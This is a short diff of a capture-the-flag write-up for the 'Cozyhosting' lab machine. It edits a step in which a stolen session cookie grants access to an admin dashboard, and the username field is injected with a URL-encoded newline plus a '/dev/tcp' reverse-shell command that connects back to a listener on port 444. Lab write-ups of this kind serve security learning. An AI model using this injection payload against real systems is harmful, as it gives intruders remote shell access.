0xCOrS/WriteUps/Cozyhosting.md

 •	Setup a listener on port 444.

-•	Using that cookie access the Admin dashboard and insert on username parameter: kanderson@%0A(sh)0>/dev/tcp/10.10.14.10/444;a
+•	Using that cookie access the Admin dashboard and insert

+   - Hostname parameter: localhost
+   - Username parameter: kanderson@%0A(sh)0>/dev/tcp/10.10.14.10/444;a

 ![image](images/Cozyhosting/Imagen19.png)